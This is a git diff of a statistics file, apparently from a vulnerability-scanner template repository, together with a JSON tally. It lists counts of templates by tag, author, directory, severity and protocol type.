@secureitmania","count":1},{"name":"xeldax","count":1},{"name":"whynotke","count":1},{"name":"notsoevilweasel","count":1},{"name":"cookiehanhoan","count":1},{"name":"revblock","count":1},{"name":"hakimkt","count":1},{"name":"arjunchandarana","count":1},{"name":"jna1","count":1},{"name":"luqmaan hadia","count":1},{"name":"af001","count":1},{"name":"dk999","count":1},{"name":"lethargynavigator","count":1},{"name":"francescocarlucci","count":1},{"name":"jbaines-r7","count":1},{"name":"affix","count":1},{"name":"intx0x80","count":1},{"name":"kareemse1im","count":1},{"name":"jas37","count":1},{"name":"breno_css","count":1},{"name":"paper-pen","count":1},{"name":"furkansayim","count":1},{"name":"ramkrishna sawant","count":1},{"name":"s1r1u5_","count":1},{"name":"zinminphy0","count":1},{"name":"udinchan","count":1},{"name":"omarkurt","count":1},{"name":"calumjelrick","count":1},{"name":"zhenwarx","count":1},{"name":"lamscun","count":1},{"name":"kabirsuda","count":1},{"name":"maximus decimus","count":1},{"name":"couskito","count":1},{"name":"carlosvieira","count":1},{"name":"ling","count":1},{"name":"0xceba","count":1},{"name":"aayush vishnoi","count":1},{"name":"andysvints","count":1},{"name":"elitebaz","count":1},{"name":"micha3lb3n","count":1},{"name":"undefl0w","count":1},{"name":"adrianmf","count":1},{"name":"nerrorsec","count":1},{"name":"geraldino2","count":1},{"name":"lrtk-coder","count":1},{"name":"sshell","count":1},{"name":"infosecsanyam","count":1},{"name":"caon","count":1},{"name":"0xceeb","count":1},{"name":"retr02332","count":1},{"name":"exid","count":1},{"name":"jaskaran","count":1},{"name":"pdp","count":1},{"name":"alperenkesk","count":1},{"name":"fmunozs","count":1},{"name":"manasmbellani","count":1},{"name":"shelld3v","count":1},{"name":"xstp","count":1},{"name":"sak1","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"mah3sec_","count":1},{"name":"stupidfish","count":1},{"name":"fq_hsu","count":1},{"name":"schniggie","count":1},{"name":"mesaglio","count":1},{"name":"mrcl0wnlab","count":1},{"name":"chron0x","count":1},{"name":"fopina","count":1},{"name":"f1she3","count":1},{"name":"nytr0gen","count":1},{"name":"flag007","count":1},{"name":"xshuden","count":1},{"name":"h4kux","count":1},{"name":"alevsk","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"compr00t","count":1},{"name":"1nf1n7y","count":1},{"name":"th3.d1p4k","count":1},{"name":"jrolf","count":1},{"name":"tea","count":1},{"name":"toufik-airane","count":1},{"name":"0xh7ml","count":1},{"name":"anon-artist","count":1},{"name":"0xtavian","count":1},{"name":"_c0wb0y_","count":1},{"name":"justmumu","count":1},{"name":"jcockhren","count":1},{"name":"alexrydzak","count":1},{"name":"elouhi","count":1},{"name":"zandros0","count":1},{"name":"sicksec","count":1},{"name":"shockwave","count":1},{"name":"nielsing","count":1},{"name":"elmahdi","count":1},{"name":"2rs3c","count":1},{"name":"imhunterand","count":1},{"name":"wabafet","count":1},{"name":"ldionmarcil","count":1},{"name":"mantissts","count":1},{"name":"piyushchhiroliya","count":1},{"name":"evan rubinstien","count":1},{"name":"b0yd","count":1},{"name":"furkansenan","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"dievus","count":1},{"name":"shiar","count":1},{"name":"hexcat","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"act1on3","count":1},{"name":"alex","count":1},{"name":"vinit989","count":1},{"name":"juicypotato1","count":1},{"name":"tim_koopmans","count":1},{"name":"harshinsecurity","count":1},{"name":"open-sec","count":1},{"name":"rodnt","count":1},{"name":"w0tx","count":1},{"name":"apt-mirror","count":1},{"name":"pjborah","count":1},{"name":"kr1shna4garwal","count":1},{"name":"pratik khalane","count":1},{"name":"dhiyaneshdki","count":1},{"name":"ola456","count":1},{"name":"pascalheidmann","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"shifacyclewla","count":1},{"name":"petruknisme","count":1},{"name":"ahmed sherif","count":1},{"name":"mhdsamx","count":1},{"name":"miroslavsotak","count":1},{"name":"jteles","count":1},{"name":"bad5ect0r","count":1},{"name":"florianmaak","count":1},{"name":"ok_bye_now","count":1},{"name":"akash.c","count":1},{"name":"regala_","count":1},{"name":"charanrayudu","count":1},{"name":"y0no","count":1},{"name":"p-l-","count":1},{"name":"manuelbua","count":1},{"name":"tehtbl","count":1},{"name":"arm!tage","count":1},{"name":"yashanand155","count":1},{"name":"allenwest24","count":1},{"name":"deena","count":1},{"name":"hardik-rathod","count":1},{"name":"mubassirpatel","count":1},{"name":"luskabol","count":1},{"name":"kiks7","count":1},{"name":"berkdusunur","count":1},{"name":"vzamanillo","count":1},{"name":"_darrenmartyn","count":1},{"name":"willd96","count":1},{"name":"makyotox","count":1},{"name":"arr0way","count":1},{"name":"ilovebinbash","count":1},{"name":"megamansec","count":1},{"name":"djoevanka","count":1},{"name":"arall","count":1},{"name":"thevillagehacker","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"aresx","count":1},{"name":"luqman","count":1},{"name":"streetofhackerr007","count":1},{"name":"realexp3rt","count":1},{"name":"sinkettu","count":1},{"name":"yuansec","count":1},{"name":"x6263","count":1},{"name":"noamrathaus","count":1},{"name":"husain","count":1},{"name":"rschio","count":1},{"name":"jeya.seelan","count":1},{"name":"lark lab","count":1},{"name":"blckraven","count":1},{"name":"ransomsec","count":1},{"name":"5up3r541y4n","count":1},{"name":"prettyboyaaditya","count":1},{"name":"marcos_iaf","count":1},{"name":"kailashbohara","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"mass0ma","count":1},{"name":"patralos","count":1},{"name":"tirtha","count":1},{"name":"knassar702","count":1},{"name":"0ut0fb4nd","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"ringo","count":1},{"name":"nagli","count":1},{"name":"jbertman","count":1},{"name":"ph33rr","count":1},{"name":"noraj","count":1},{"name":"rojanrijal","count":1},{"name":"b0rn2r00t","count":1},{"name":"screamy","count":1},{"name":"rubina119","count":1},{"name":"aaronchen0","count":1},{"name":"osamahamad","count":1},{"name":"elder tao","count":1},{"name":"jiheon-dev","count":1},{"name":"droberson","count":1},{"name":"lingtren","count":1},{"name":"lixts","count":1},{"name":"clment cruchet","count":1},{"name":"igibanez","count":1},{"name":"iampritam","count":1},{"name":"orpheus","count":1},{"name":"pudsec","count":1},{"name":"udyz","count":1},{"name":"kaizensecurity","count":1},{"name":"exploitation","count":1},{"name":"d0rkerdevil","count":1},{"name":"secthebit","count":1},{"name":"theabhinavgaur","count":1},{"name":"coldfish","count":1},{"name":"httpvoid","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"yashgoti","count":1},{"name":"rivalsec","count":1},{"name":"liquidsec","count":1},{"name":"failopen","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"bughuntersurya","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"hanlaomo","count":1},{"name":"becivells","count":1},{"name":"ptonewreckin","count":1},{"name":"thelicato","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"tirtha_mandal","count":1},{"name":"narluin","count":1},{"name":"un-fmunozs","count":1},{"name":"amanrawat","count":1},{"name":"dale clarke","count":1},{"name":"remi gascou (podalirius)","count":1}],"directory":[{"name":"cves","count":1529},{"name":"exposed-panels","count":782},{"name":"vulnerabilities","count":520},{"name":"misconfiguration","count":361},{"name":"technologies","count":322},{"name":"exposures","count":308},{"name":"token-spray","count":236},{"name":"workflows","count":190},{"name":"default-logins","count":116},{"name":"file","count":78},{"name":"takeovers","count":69},{"name":"network","count":63},{"name":"iot","count":41},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1671},{"name":"high","count":1152},{"name":"medium","count":837},{"name":"critical","count":552},{"name":"low","count":281},{"name":"unknown","count":25}],"types":[{"name":"http","count":4330},{"name":"file","count":78},{"name":"network","count":77},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 16c331f8f6..d63849fa39 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,2262 +1,2282 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | -| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | +| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | | exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | -| lfi | 519 | pussycat0x | 171 | exposures | 308 | unknown | 25 | | | -| wordpress | 470 | dwisiswant0 | 171 | token-spray | 236 | | | | | -| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | | -| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | | -| tech | 357 | princechaddha | 153 | file | 78 | | | | | +| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | +| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | +| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | +| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | | +| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | +| tech | 360 | princechaddha | 153 | file | 78 | | | | | | rce | 347 | gy741 | 135 | takeovers | 69 | | | | | -| packetstorm | 292 | arafatansari | 106 | network | 63 | | | | | -| cve2022 | 269 | tess | 85 | iot | 41 | | | | | -| wpscan | 256 | madrobot | 65 | miscellaneous | 25 | | | | | -| token-spray | 236 | zzeitlin | 64 | cnvd | 25 | | | | | +| packetstorm | 292 | arafatansari | 107 | network | 63 | | | | | +| cve2022 | 266 | tess | 85 | iot | 41 | | | | | +| wpscan | 256 | madrobot | 65 | cnvd | 25 | | | | | +| token-spray | 236 | zzeitlin | 64 | miscellaneous | 25 | | | | | | misconfig | 228 | idealphase | 62 | dns | 17 | | | | | -| cve2020 | 222 | akincibor | 55 | fuzzing | 12 | | | | | +| cve2020 | 224 | akincibor | 55 | fuzzing | 12 | | | | | | | 195 | for3stco1d | 49 | ssl | 8 | | | | | | unauth | 194 | gaurang | 42 | headless | 7 | | | | | -| wp | 187 | philippedelteil | 37 | | | | | | | +| wp | 188 | philippedelteil | 37 | | | | | | | | kev | 168 | edoardottt | 36 | | | | | | | -| config | 167 | c-sh0 | 32 | | | | | | | -| cve2018 | 145 | theamanrawat | 31 | | | | | | | -| cve2019 | 137 | adam crosser | 31 | | | | | | | -| joomla | 135 | righettod | 29 | | | | | | | +| config | 167 | c-sh0 | 34 | | | | | | | +| cve2018 | 145 | adam crosser | 31 | | | | | | | +| cve2019 | 137 | theamanrawat | 31 | | | | | | | +| joomla | 135 | righettod | 30 | | | | | | | | default-login | 133 | ice3man | 26 | | | | | | | | apache | 127 | organiccrap | 24 | | | | | | | | oast | 127 | ffffffff0x | 22 | | | | | | | | iot | 125 | techbrunchfr | 21 | | | | | | | -| authenticated | 120 | cckuailong | 18 | | | | | | | +| authenticated | 121 | cckuailong | 18 | | | | | | | | sqli | 118 | sullo | 17 | | | | | | | | cve2010 | 111 | pr3r00t | 15 | | | | | | | -| files | 92 | sheikhrishad | 15 | | | | | | | -| router | 92 | r3dg33k | 14 | | | | | | | -| redirect | 90 | milo2012 | 14 | | | | | | | -| login | 89 | 0ri2n | 13 | | | | | | | -| network | 81 | random-robbie | 13 | | | | | | | -| devops | 75 | sharath | 13 | | | | | | | -| takeover | 75 | tenbird | 13 | | | | | | | -| token | 74 | johnk3r | 13 | | | | | | | -| ssrf | 72 | suman_kar | 12 | | | | | | | -| cve2017 | 70 | melbadry9 | 12 | | | | | | | +| router | 92 | sheikhrishad | 15 | | | | | | | +| files | 92 | johnk3r | 14 | | | | | | | +| redirect | 90 | r3dg33k | 14 | | | | | | | +| login | 89 | milo2012 | 14 | | | | | | | +| network | 81 | tenbird | 13 | | | | | | | +| devops | 75 | random-robbie | 13 | | | | | | | +| takeover | 75 | 0ri2n | 13 | | | | | | | +| token | 74 | sharath | 13 | | | | | | | +| ssrf | 72 | melbadry9 | 12 | | | | | | | +| cve2017 | 71 | suman_kar | 12 | | | | | | | | cms | 67 | wdahlenb | 11 | | | | | | | | auth-bypass | 66 | cyllective | 11 | | | | | | | -| file | 65 | elsfa7110 | 11 | | | | | | | -| oracle | 63 | dogasantos | 11 | | | | | | | -| intrusive | 60 | ricardomaia | 10 | | | | | | | -| install | 59 | alph4byt3 | 10 | | | | | | | -| seclists | 57 | hackergautam | 10 | | | | | | | -| disclosure | 57 | random_robbie | 10 | | | | | | | -| oss | 52 | meme-lord | 10 | | | | | | | +| file | 65 | dogasantos | 11 | | | | | | | +| oracle | 63 | elsfa7110 | 11 | | | | | | | +| intrusive | 60 | nadino | 10 | | | | | | | +| install | 59 | hackergautam | 10 | | | | | | | +| seclists | 57 | meme-lord | 10 | | | | | | | +| disclosure | 57 | ricardomaia | 10 | | | | | | | +| oss | 52 | random_robbie | 10 | | | | | | | | cisco | 50 | logicalhunter | 10 | | | | | | | -| cve2016 | 49 | nadino | 10 | | | | | | | +| cve2016 | 49 | alph4byt3 | 10 | | | | | | | | google | 48 | oppsec | 9 | | | | | | | | fileupload | 47 | emadshanab | 9 | | | | | | | | cve2015 | 47 | 0x240x23elu | 9 | | | | | | | -| adobe | 45 | iamthefrogy | 8 | | | | | | | -| aem | 42 | veshraj | 8 | | | | | | | -| plugin | 41 | that_juan_ | 8 | | | | | | | -| cve2014 | 41 | lu4nx | 8 | | | | | | | -| atlassian | 38 | aashiq | 8 | | | | | | | -| vulhub | 38 | zh | 8 | | | | | | | -| logs | 38 | divya_mudgal | 7 | | | | | | | -| vmware | 38 | kophjager007 | 7 | | | | | | | +| adobe | 45 | zh | 8 | | | | | | | +| aem | 42 | aashiq | 8 | | | | | | | +| plugin | 41 | veshraj | 8 | | | | | | | +| cve2014 | 41 | iamthefrogy | 8 | | | | | | | +| hackerone | 39 | that_juan_ | 8 | | | | | | | +| atlassian | 38 | lu4nx | 8 | | | | | | | +| logs | 38 | techryptic (@tech) | 7 | | | | | | | +| vulhub | 38 | kophjager007 | 7 | | | | | | | +| vmware | 38 | amit-jd | 7 | | | | | | | | debug | 37 | randomstr1ng | 7 | | | | | | | -| hackerone | 37 | amit-jd | 7 | | | | | | | -| tenable | 36 | dr_set | 7 | | | | | | | -| traversal | 35 | techryptic (@tech) | 7 | | | | | | | +| tenable | 36 | divya_mudgal | 7 | | | | | | | | springboot | 35 | harshbothra_ | 7 | | | | | | | -| injection | 34 | leovalcante | 7 | | | | | | | -| jira | 32 | caspergn | 7 | | | | | | | -| listing | 31 | gitlab red team | 6 | | | | | | | -| huntr | 31 | __fazal | 6 | | | | | | | -| kubernetes | 30 | imnightmaree | 6 | | | | | | | -| generic | 28 | nullfuzz | 6 | | | | | | | -| dns | 27 | _0xf4n9x_ | 6 | | | | | | | -| log4j | 26 | iamnoooob | 6 | | | | | | | -| sap | 25 | pentest_swissky | 6 | | | | | | | -| microsoft | 25 | praetorian-thendrickson | 6 | | | | | | | -| cnvd | 25 | puzzlepeaches | 6 | | | | | | | -| misc | 23 | forgedhallpass | 6 | | | | | | | -| aws | 23 | pathtaga | 6 | | | | | | | -| proxy | 23 | rootxharsh | 6 | | | | | | | -| jndi | 23 | evan rubinstein | 6 | | | | | | | +| traversal | 35 | dr_set | 7 | | | | | | | +| injection | 34 | caspergn | 7 | | | | | | | +| jira | 32 | leovalcante | 7 | | | | | | | +| huntr | 31 | gitlab red team | 6 | | | | | | | +| listing | 31 | evan rubinstein | 6 | | | | | | | +| kubernetes | 30 | forgedhallpass | 6 | | | | | | | +| generic | 28 | imnightmaree | 6 | | | | | | | +| dns | 27 | nullfuzz | 6 | | | | | | | +| log4j | 26 | pathtaga | 6 | | | | | | | +| sap | 25 | praetorian-thendrickson | 6 | | | | | | | +| microsoft | 25 | iamnoooob | 6 | | | | | | | +| cnvd | 25 | _0xf4n9x_ | 6 | | | | | | | +| jndi | 23 | __fazal | 6 | | | | | | | +| misc | 23 | rootxharsh | 6 | | | | | | | +| proxy | 23 | puzzlepeaches | 6 | | | | | | | +| aws | 23 | pentest_swissky | 6 | | | | | | | | fuzz | 22 | clem9669 | 5 | | | | | | | | php | 22 | nodauf | 5 | | | | | | | -| cve2012 | 21 | its0x08 | 5 | | | | | | | -| zoho | 21 | xelkomy | 5 | | | | | | | -| wp-theme | 21 | podalirius | 5 | | | | | | | -| manageengine | 21 | prajiteshsingh | 5 | | | | | | | -| api | 20 | panch0r3d | 5 | | | | | | | -| weblogic | 20 | ganofins | 5 | | | | | | | +| wp-theme | 21 | panch0r3d | 5 | | | | | | | +| manageengine | 21 | its0x08 | 5 | | | | | | | +| api | 21 | podalirius | 5 | | | | | | | +| zoho | 21 | ganofins | 5 | | | | | | | +| cve2012 | 21 | xelkomy | 5 | | | | | | | +| weblogic | 20 | prajiteshsingh | 5 | | | | | | | | cloud | 20 | joanbono | 5 | | | | | | | -| camera | 19 | yanyun | 5 | | | | | | | -| ibm | 19 | scent2d | 4 | | | | | | | -| cicd | 19 | powerexploit | 4 | | | | | | | +| k8s | 19 | yanyun | 5 | | | | | | | +| camera | 19 | e_schultze_ | 4 | | | | | | | | deserialization | 19 | wisnupramoedya | 4 | | | | | | | -| k8s | 19 | r3naissance | 4 | | | | | | | -| tomcat | 19 | 3th1c_yuk1 | 4 | | | | | | | -| gitlab | 18 | dolev farhi | 4 | | | | | | | -| dlink | 18 | hardik-solanki | 4 | | | | | | | -| jenkins | 17 | h1ei1 | 4 | | | | | | | -| wavlink | 17 | 0xlittleboy | 4 | | | | | | | -| firewall | 17 | defr0ggy | 4 | | | | | | | -| service | 17 | e_schultze_ | 4 | | | | | | | -| struts | 17 | shine | 4 | | | | | | | -| ftp | 16 | incogbyte | 4 | | | | | | | -| printer | 16 | dadevel | 4 | | | | | | | -| cve2011 | 15 | robotshell | 4 | | | | | | | -| nginx | 15 | tanq16 | 4 | | | | | | | -| xxe | 15 | lark-lab | 3 | | | | | | | -| cve2009 | 15 | mr-xn | 3 | | | | | | | -| java | 14 | _generic_human_ | 3 | | | | | | | -| fortinet | 14 | splint3r7 | 3 | | | | | | | -| domainmod | 14 | thomas_from_offensity | 3 | | | | | | | -| hp | 14 | ph33r | 3 | | | | | | | -| android | 14 | arcc | 3 | | | | | | | -| amazon | 13 | davidmckennirey | 3 | | | | | | | -| magento | 13 | jarijaas | 3 | | | | | | | -| abstractapi | 13 | lucasljm2001 | 3 | | | | | | | -| cve2008 | 13 | swissky | 3 | | | | | | | -| confluence | 13 | me9187 | 3 | | | | | | | +| ibm | 19 | defr0ggy | 4 | | | | | | | +| tomcat | 19 | hardik-solanki | 4 | | | | | | | +| cicd | 19 | powerexploit | 4 | | | | | | | +| dlink | 18 | scent2d | 4 | | | | | | | +| gitlab | 18 | 3th1c_yuk1 | 4 | | | | | | | +| firewall | 17 | incogbyte | 4 | | | | | | | +| jenkins | 17 | shine | 4 | | | | | | | +| struts | 17 | dolev farhi | 4 | | | | | | | +| service | 17 | h1ei1 | 4 | | | | | | | +| wavlink | 17 | tanq16 | 4 | | | | | | | +| printer | 16 | r3naissance | 4 | | | | | | | +| ftp | 16 | 0xlittleboy | 4 | | | | | | | +| nginx | 15 | robotshell | 4 | | | | | | | +| xxe | 15 | dadevel | 4 | | | | | | | +| cve2009 | 15 | thomas_from_offensity | 3 | | | | | | | +| fortinet | 15 | andydoering | 3 | | | | | | | +| cve2011 | 15 | hahwul | 3 | | | | | | | +| java | 14 | ph33r | 3 | | | | | | | +| hp | 14 | binaryfigments | 3 | | | | | | | +| domainmod | 14 | fyoorer | 3 | | | | | | | +| android | 14 | unstabl3 | 3 | | | | | | | +| woocommerce | 13 | arcc | 3 | | | | | | | +| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | +| magento | 13 | mr-xn | 3 | | | | | | | +| cve2013 | 13 | splint3r7 | 3 | | | | | | | +| amazon | 13 | swissky | 3 | | | | | | | +| status | 13 | johnjhacking | 3 | | | | | | | +| confluence | 13 | 0w4ys | 3 | | | | | | | | msf | 13 | dudez | 3 | | | | | | | -| woocommerce | 13 | shifacyclewala | 3 | | | | | | | -| status | 13 | f1tz | 3 | | | | | | | -| cve2013 | 13 | emenalf | 3 | | | | | | | -| lfr | 13 | yuzhe-zhang-0 | 3 | | | | | | | -| vpn | 12 | z3bd | 3 | | | | | | | -| github | 12 | sushantkamble | 3 | | | | | | | -| netgear | 12 | binaryfigments | 3 | | | | | | | -| drupal | 12 | ekrause | 3 | | | | | | | -| graphql | 12 | unstabl3 | 3 | | | | | | | -| netsweeper | 12 | fxploit | 3 | | | | | | | -| backup | 12 | alifathi-h1 | 3 | | | | | | | -| rails | 12 | 0w4ys | 3 | | | | | | | -| microweber | 12 | mavericknerd | 3 | | | | | | | -| ruijie | 12 | whoever | 3 | | | | | | | -| zyxel | 11 | andydoering | 3 | | | | | | | -| mail | 11 | supras | 3 | | | | | | | -| ssl | 11 | impramodsargar | 3 | | | | | | | -| webserver | 11 | yash anand @yashanand155 | 3 | | | | | | | -| airflow | 11 | hahwul | 3 | | | | | | | -| cisa | 11 | fyoorer | 3 | | | | | | | -| fortigate | 11 | ambassify | 3 | | | | | | | -| azure | 11 | johnjhacking | 3 | | | | | | | -| backdoor | 11 | dr0pd34d | 3 | | | | | | | -| cnvd2021 | 11 | kh4sh3i | 3 | | | | | | | -| grafana | 10 | skeltavik | 3 | | | | | | | -| django | 10 | atomiczsec | 3 | | | | | | | -| ruby | 10 | moritz nentwig | 2 | | | | | | | -| jolokia | 10 | notnotnotveg | 2 | | | | | | | -| glpi | 10 | w4cky_ | 2 | | | | | | | -| laravel | 10 | ajaysenr | 2 | | | | | | | -| spring | 10 | hetroublemakr | 2 | | | | | | | -| dell | 10 | y4er | 2 | | | | | | | -| git | 10 | smaranchand | 2 | | | | | | | -| coldfusion | 10 | g4l1t0 | 2 | | | | | | | -| wso2 | 9 | bernardofsr | 2 | | | | | | | -| vcenter | 9 | myztique | 2 | | | | | | | -| sonicwall | 9 | k11h-de | 2 | | | | | | | -| ssh | 9 | thezakman | 2 | | | | | | | -| iis | 9 | uomogrande | 2 | | | | | | | -| kube | 9 | gal nagli | 2 | | | | | | | -| windows | 9 | nuk3s3c | 2 | | | | | | | -| zimbra | 9 | kiblyn11 | 2 | | | | | | | -| ssti | 9 | randomrobbie | 2 | | | | | | | -| zabbix | 9 | cocxanh | 2 | | | | | | | -| prometheus | 9 | gevakun | 2 | | | | | | | -| fastjson | 9 | raesene | 2 | | | | | | | -| phpmyadmin | 9 | bananabr | 2 | | | | | | | -| dedecms | 9 | dahse89 | 2 | | | | | | | -| citrix | 8 | 0xrudra | 2 | | | | | | | -| audit | 8 | wa1tf0rme | 2 | | | | | | | -| jboss | 8 | 8arthur | 2 | | | | | | | -| versa | 8 | canberbamber | 2 | | | | | | | -| kafka | 8 | rafaelwdornelas | 2 | | | | | | | -| cisco-switch | 8 | hackerarpan | 2 | | | | | | | -| solarview | 8 | lotusdll | 2 | | | | | | | -| solr | 8 | paperpen | 2 | | | | | | | -| recon | 8 | cckuakilong | 2 | | | | | | | -| auth | 8 | vsh00t | 2 | | | | | | | -| symfony | 8 | ehsahil | 2 | | | | | | | -| bucket | 8 | bsysop | 2 | | | | | | | -| headless | 8 | huowuzhao | 2 | | | | | | | -| scada | 8 | codexlynx | 2 | | | | | | | -| npm | 8 | paradessia | 2 | | | | | | | -| elasticsearch | 8 | github.com/its0x08 | 2 | | | | | | | -| metadata | 8 | dheerajmadhukar | 2 | | | | | | | -| mirai | 8 | 666asd | 2 | | | | | | | -| jetbrains | 8 | ree4pwn | 2 | | | | | | | -| config-audit | 8 | dbrwsky | 2 | | | | | | | -| hms | 8 | joeldeleep | 2 | | | | | | | -| firebase | 7 | ricardo maia (brainfork) | 2 | | | | | | | -| seeyon | 7 | brenocss | 2 | | | | | | | -| docker | 7 | 0xprial | 2 | | | | | | | -| cnvd2020 | 7 | sy3omda | 2 | | | | | | | -| icewarp | 7 | n-thumann | 2 | | | | | | | -| go | 7 | 0xsapra | 2 | | | | | | | -| exchange | 7 | korteke | 2 | | | | | | | -| druid | 7 | 0xsmiley | 2 | | | | | | | -| nodejs | 7 | sbani | 2 | | | | | | | -| python | 7 | 0xelkomy | 2 | | | | | | | -| squirrelmail | 7 | 0xcrypto | 2 | | | | | | | -| maps | 7 | thardt-praetorian | 2 | | | | | | | -| samsung | 7 | redteambrasil | 2 | | | | | | | -| ognl | 7 | bp0lr | 2 | | | | | | | -| blind | 7 | afaq | 2 | | | | | | | -| opencats | 7 | r12w4n | 2 | | | | | | | -| detect | 7 | amsda | 2 | | | | | | | -| websphere | 6 | danielmofer | 2 | | | | | | | -| lucee | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | convisoappsec | 2 | | | | | | | -| thinkphp | 6 | nkxxkn | 2 | | | | | | | -| moodle | 6 | foulenzer | 2 | | | | | | | -| activemq | 6 | x1m_martijn | 2 | | | | | | | -| ofbiz | 6 | koti2 | 2 | | | | | | | -| elfinder | 6 | manas_harsh | 2 | | | | | | | -| ecology | 6 | v0idc0de | 2 | | | | | | | -| admin | 6 | bing0o | 2 | | | | | | | -| cobbler | 6 | s0obi | 2 | | | | | | | -| bypass | 6 | parth | 2 | | | | | | | -| huawei | 6 | clarkvoss | 2 | | | | | | | -| artica | 6 | martincodes-de | 2 | | | | | | | -| magmi | 6 | badboycxcc | 2 | | | | | | | -| node | 6 | pxmme1337 | 2 | | | | | | | -| cache | 6 | socketz | 2 | | | | | | | -| db | 6 | israel comazzetto dos reis | 2 | | | | | | | -| openvpn | 6 | true13 | 2 | | | | | | | -| liferay | 6 | d4vy | 2 | | | | | | | -| enum | 6 | mohammedsaneem | 2 | | | | | | | -| fpd | 6 | kre80r | 2 | | | | | | | -| bigip | 6 | taielab | 2 | | | | | | | -| crlf | 6 | z0ne | 2 | | | | | | | -| emerge | 6 | joshlarsen | 2 | | | | | | | -| opensis | 6 | 0xnirvana | 2 | | | | | | | -| jamf | 6 | zomsop82 | 2 | | | | | | | -| kubelet | 6 | geekby | 2 | | | | | | | -| zhiyuan | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| jetty | 6 | evergreencartoons | 2 | | | | | | | -| setup | 6 | kishore-hariram | 2 | | | | | | | -| vms | 6 | luci | 2 | | | | | | | -| slack | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| smtp | 6 | vavkamil | 2 | | | | | | | -| microstrategy | 6 | fabaff | 2 | | | | | | | -| sitecore | 6 | nvn1729 | 2 | | | | | | | -| alibaba | 5 | pratik khalane | 1 | | | | | | | -| rfi | 5 | kailashbohara | 1 | | | | | | | -| awstats | 5 | bibeksapkota (sar00n) | 1 | | | | | | | -| scan | 5 | _c0wb0y_ | 1 | | | | | | | -| solarwinds | 5 | nobody | 1 | | | | | | | -| gogs | 5 | francescocarlucci | 1 | | | | | | | -| avideo | 5 | danigoland | 1 | | | | | | | -| s3 | 5 | djoevanka | 1 | | | | | | | -| firmware | 5 | toufik-airane | 1 | | | | | | | -| circarlife | 5 | remonsec | 1 | | | | | | | -| rseenet | 5 | 0xh7ml | 1 | | | | | | | -| plesk | 5 | majidmc2 | 1 | | | | | | | -| fortios | 5 | allenwest24 | 1 | | | | | | | -| fatpipe | 5 | charanrayudu | 1 | | | | | | | -| apisix | 5 | realexp3rt | 1 | | | | | | | -| carrental | 5 | ipanda | 1 | | | | | | | -| metinfo | 5 | akash.c | 1 | | | | | | | -| symantec | 5 | thelicato | 1 | | | | | | | -| strapi | 5 | iampritam | 1 | | | | | | | -| mongodb | 5 | ofjaaah | 1 | | | | | | | -| keycloak | 5 | aceseven (digisec360) | 1 | | | | | | | -| gocd | 5 | nagli | 1 | | | | | | | -| minio | 5 | couskito | 1 | | | | | | | -| parallels | 5 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| filemanager | 5 | yashgoti | 1 | | | | | | | -| prestashop | 5 | natto97 | 1 | | | | | | | -| database | 5 | httpvoid | 1 | | | | | | | -| elastic | 5 | push4d | 1 | | | | | | | -| storage | 5 | izn0u | 1 | | | | | | | -| nagios | 5 | shockwave | 1 | | | | | | | -| redis | 5 | thebinitghimire | 1 | | | | | | | -| vbulletin | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| 74cms | 5 | rotembar | 1 | | | | | | | -| leak | 5 | jaskaran | 1 | | | | | | | -| error | 5 | pdp | 1 | | | | | | | -| cockpit | 5 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| lfr | 13 | emenalf | 3 | | | | | | | +| cve2008 | 13 | atomiczsec | 3 | | | | | | | +| fortigate | 12 | yuzhe-zhang-0 | 3 | | | | | | | +| netgear | 12 | ekrause | 3 | | | | | | | +| drupal | 12 | lark-lab | 3 | | | | | | | +| microweber | 12 | shifacyclewala | 3 | | | | | | | +| ruijie | 12 | davidmckennirey | 3 | | | | | | | +| vpn | 12 | sushantkamble | 3 | | | | | | | +| github | 12 | kh4sh3i | 3 | | | | | | | 